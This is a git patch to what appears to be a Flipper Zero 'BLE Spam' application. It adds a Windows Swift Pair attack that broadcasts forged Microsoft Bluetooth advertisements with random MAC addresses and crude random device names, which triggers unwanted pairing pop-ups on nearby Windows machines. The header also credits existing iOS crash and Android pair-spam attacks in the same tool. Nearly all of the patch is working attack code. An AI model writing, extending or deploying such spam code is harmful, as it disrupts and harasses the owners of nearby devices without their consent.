From 68baeff45aeef4c7795c5cde832caf9547f7142a Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Sun, 15 Oct 2023 19:24:26 +0100 Subject: [PATCH] BLE Spam add Windows SwiftPair spam Co-authored-by: Spooks <62370103+Spooks4576@users.noreply.github.com> --- applications/external/ble_spam/ble_spam.c | 17 +++++- .../external/ble_spam/icons/windows.png | Bin 0 -> 4478 bytes .../external/ble_spam/protocols/_registry.c | 1 + .../external/ble_spam/protocols/_registry.h | 2 + .../external/ble_spam/protocols/swiftpair.c | 54 ++++++++++++++++++ .../external/ble_spam/protocols/swiftpair.h | 11 ++++ 6 files changed, 83 insertions(+), 2 deletions(-) create mode 100644 applications/external/ble_spam/icons/windows.png create mode 100644 applications/external/ble_spam/protocols/swiftpair.c create mode 100644 applications/external/ble_spam/protocols/swiftpair.h diff --git a/applications/external/ble_spam/ble_spam.c b/applications/external/ble_spam/ble_spam.c index 82903121a..605fc1372 100644 --- a/applications/external/ble_spam/ble_spam.c +++ b/applications/external/ble_spam/ble_spam.c @@ -7,7 +7,7 @@ // Hacked together by @Willy-JL // Custom adv API by @Willy-JL (idea by @xMasterX) // iOS 17 Crash by @ECTO-1A -// Android Pairs by @Spooks4576 and @ECTO-1A +// Android and Windows Pairs by @Spooks4576 and @ECTO-1A // Research on behaviors and parameters by @Willy-JL, @ECTO-1A and @Spooks4576 // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam @@ -98,6 +98,19 @@ static Attack attacks[] = { }, }, }, + { + .title = "Windows Device Found", + .text = "Requires enabling SwiftPair", + .payload = + { + .random_mac = true, + .protocol = &ble_spam_protocol_swiftpair, + .msg = + { + .swiftpair = {}, + }, + }, + }, }; #define ATTACK_COUNT ((signed)COUNT_OF(attacks)) @@ -256,7 +269,7 @@ static void draw_callback(Canvas* canvas, void* ctx) { AlignTop, "App+Spam: \e#WillyJL\e# XFW\n" "Apple+Crash: \e#ECTO-1A\e#\n" - "Android: \e#Spooks4576\e#\n" + "Android+Win: \e#Spooks4576\e#\n" " Version \e#2.0\e#", false); break; diff --git a/applications/external/ble_spam/icons/windows.png b/applications/external/ble_spam/icons/windows.png new file mode 100644 index 0000000000000000000000000000000000000000..9b734d16156dd72fc9d57a2d5df50b57b2eb2aab GIT binary patch literal 4478 zcmeHLeQXnD7{6}pgX$JtrVuo67731dy}RDEy*pRNSjSdaVT=NsL-Bg|b~{)<*51}` zL?z%CD2@*ir>Kx1L?R?ah+lvpEMP>y@R9ftokK*_fQeDmi1@tMuG`eaEXsdt`}TeA zeV_ODJkRfa-sgHU) z{dQ>D<4IflLB_9K)C+N>;N<#<@n*f@!0B$gu?PU2a~#)Ey+rhbnw z(wN@UqrkuAT6uYmr@WkuM8g5C89~q+A6(?uBzIim3dyn_7<6ymde zo$)JUP!Jat5dfAoefbj(w0-hb}9v8Mf>ceg)# z?XA*E_lFHP=00)w^L*N|IM#k~+2PIw^GhB&w?MD&>6*>0 zduig+1y6S8&y${8U%e`^QrNmkI)6ib=iK8B8~03Kwdd0N3r8RSuK0rm+r&riymi-z zk(R>KHPf;jy}Q5NQdf2Aq4$oIe)HReXwg@bmakDvbDLJ*SNhAi-!Gk=R6R4{`Eta` ztG&XwLsL#zPri1~@hiK|@w1lpaFJKuxOyg=`O(v{Z%6mjOZNwRdf(nrwB*3~eC7xB z=+^J2mpwmqGqLyOkDTY1{?S10{`#l0pB%ZExq9=?TIYd-cQCbEzHfawex>c_pD%aK zd${zGy6Dc+E8f)!BELcN)#-KKYDozPt+E>SBWofU!TUv&lqMpwvKZ;4A2n(rm*w(1 z?^;Mrby?=yy^J?fj+(TpjwqVbG1I4XELKF-QaagOl8^u(h;*4u1e-%KDdDmhxDv>C zn6{9HioV!ose?2s4@VKnTX`!(RV1`Fn`N?@EQzWCsn$I$1p!wsOOvigB$|%LJmLXDamtim5qZkN`E52%78F_J20+Y;YLJz3 z^FXgKlnPKzp5u9Yz)#r~Mxb~n%TuCXR4E6;a89RP@q-Bi3h#qdR^xG5Y*wa!q^4Qc z1L0`UWvSLet%?2#pB6-ObQzPzIz%Vy;01wq2zL1NE6qdE7$h9VG%BPqqbkxgK$IbI zw4mIG=t!v1n84d2K`=n9jPn$bjd6%YDvu&r4@Z6BaI?#jF1qPyFB~UT)@8S>Be0e( z!@j;UT+FZ%lZ*?)dBds}X#Y2De0azb(1$Ir(qdr0-55%qs5z)5d6m3u){LV>lE$Hs zWF;9wOm0J};U{1vr<5i+)QF&Zq|&u-T>FPqka>X@9fC-)tin>fT~H~JgKScGQL*th zSzr|BVDwlxpvUDXDr*EDfh$N);|4|EW$a+lVC{Gl!rKFcQ7l8THXmb`@I8!A5k_DC z5RoGKg#eVT0Pj#JUJlqOfp_v0&&#Zz;aTK#BsVTi;C~8{`)f|5LM)+iS?t@?68dl3 zo>Ul6M}eB;7}RGd_jJ16r#J(Dujeb3Zr9TUNe&ws62HTA4bwFw28N_OoL$3o4T*sv zDGz7Y|3;U&|A`TW;D=ruo(B*8x~d(XCA0lAD&532{NA*0+d3E-8L6s|!2{@F+)V3> z^KXN}9Npus$hlz7%P1OM{N-9Z42d3hnQ!!|Rh@6;5ln98iH{$?Fe7X3l+El~s&qDb zlgQZ1Z=35;t~Tzj4iu0JAKmUdzoV=8)l2u#* literal 0 HcmV?d00001 diff --git a/applications/external/ble_spam/protocols/_registry.c b/applications/external/ble_spam/protocols/_registry.c index 9ede92816..3d334fa14 100644 --- a/applications/external/ble_spam/protocols/_registry.c +++ b/applications/external/ble_spam/protocols/_registry.c @@ -3,6 +3,7 @@ const BleSpamProtocol* ble_spam_protocols[] = { &ble_spam_protocol_continuity, &ble_spam_protocol_fastpair, + &ble_spam_protocol_swiftpair, }; const size_t ble_spam_protocols_count = COUNT_OF(ble_spam_protocols); diff --git a/applications/external/ble_spam/protocols/_registry.h b/applications/external/ble_spam/protocols/_registry.h index f4c41c4f4..69070c356 100644 --- a/applications/external/ble_spam/protocols/_registry.h +++ b/applications/external/ble_spam/protocols/_registry.h @@ -2,10 +2,12 @@ #include "continuity.h" #include "fastpair.h" +#include "swiftpair.h" union BleSpamMsg { ContinuityMsg continuity; FastpairMsg fastpair; + SwiftpairMsg swiftpair; }; extern const BleSpamProtocol* ble_spam_protocols[]; diff --git a/applications/external/ble_spam/protocols/swiftpair.c b/applications/external/ble_spam/protocols/swiftpair.c new file mode 100644 index 000000000..26ea203e4 --- /dev/null +++ b/applications/external/ble_spam/protocols/swiftpair.c @@ -0,0 +1,54 @@ +#include "swiftpair.h" +#include "_registry.h" + +// Hacked together by @Willy-JL and @Spooks4576 +// Documentation at https://learn.microsoft.com/en-us/windows-hardware/design/component-guidelines/bluetooth-swift-pair + +const char* swiftpair_get_name(const BleSpamMsg* _msg) { + const SwiftpairMsg* msg = &_msg->swiftpair; + UNUSED(msg); + return "SwiftPair"; +} + +void swiftpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) { + const SwiftpairMsg* msg = _msg ? &_msg->swiftpair : NULL; + + const char* display_name; + if(msg && msg->display_name[0] != '\0') { + display_name = msg->display_name; + } else { + const char* names[] = { + "Assquach💦", + "Flipper 🐬", + "iOS 17 🍎", + "Kink💦", + "👉👌", + "🔵🦷", + }; + display_name = names[rand() % COUNT_OF(names)]; + } + uint8_t display_name_len = strlen(display_name); + + uint8_t size = 7 + display_name_len; + uint8_t* packet = malloc(size); + uint8_t i = 0; + + packet[i++] = size - 1; // Size + packet[i++] = 0xFF; // AD Type (Manufacturer Specific) + packet[i++] = 0x06; // Company ID (Microsoft) + packet[i++] = 0x00; // ... + packet[i++] = 0x03; // Microsoft Beacon ID + packet[i++] = 0x00; // Microsoft Beacon Sub Scenario + packet[i++] = 0x80; // Reserved RSSI Byte + memcpy(&packet[i], display_name, display_name_len); // Display Name + i += display_name_len; + + *out_size = size; + *out_packet = packet; +} + +const BleSpamProtocol ble_spam_protocol_swiftpair = { + .icon = &I_windows, + .get_name = swiftpair_get_name, + .make_packet = swiftpair_make_packet, +}; diff --git a/applications/external/ble_spam/protocols/swiftpair.h b/applications/external/ble_spam/protocols/swiftpair.h new file mode 100644 index 000000000..5ded8ebf8 --- /dev/null +++ b/applications/external/ble_spam/protocols/swiftpair.h @@ -0,0 +1,11 @@ +#pragma once +#include "_base.h" + +// Hacked together by @Willy-JL and @Spooks4576 +// Documentation at https://learn.microsoft.com/en-us/windows-hardware/design/component-guidelines/bluetooth-swift-pair + +typedef struct { + char display_name[25]; +} SwiftpairMsg; + +extern const BleSpamProtocol ble_spam_protocol_swiftpair;